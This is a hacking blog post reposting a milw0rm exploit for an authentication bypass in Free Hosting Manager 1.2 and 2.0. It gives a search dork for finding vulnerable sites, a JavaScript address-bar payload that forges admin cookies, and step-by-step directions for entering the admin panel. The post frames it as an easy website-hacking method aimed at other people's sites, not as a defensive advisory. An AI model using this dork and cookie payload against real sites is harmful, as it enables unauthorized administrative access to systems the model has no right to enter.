Sign by xXx - xXx Rulez

One of the easiest method of WEBSITE HACKING  


25,

Free Hosting Manager = 1.2 & 2.0
Insecure Cookie Handling Vulnerability

DorKs : "Powered By Free Hosting Manager"

DESCRIPTION :
the admin panel only checks if the cookie exists.

Vulnerability :
after opening the site
just run the javascript in address bar
javascript:document.cookie = "adminuser=1; path=/"; document.cookie = "loggedin=1; path=/";

as in this blog the complete line
above is not visible..
just copy-paste this
in notepad to see it completely

after running the javascript,
Go to "www.site.com/admin" & Refresh

BANG!!! u will be in admin pannel

AUTHOR : Scary-Boys

source : http://www.milw0rm.com/exploits/6213

This entry was posted on 3:09 AM and is filed under . You can leave a response and follow any responses to this entry through the Subscribe to: Post Comments (Atom) .

0 comments

Label Cloud

Blogumulus by Roy Tanck and Amanda Fazani

Your Ad Here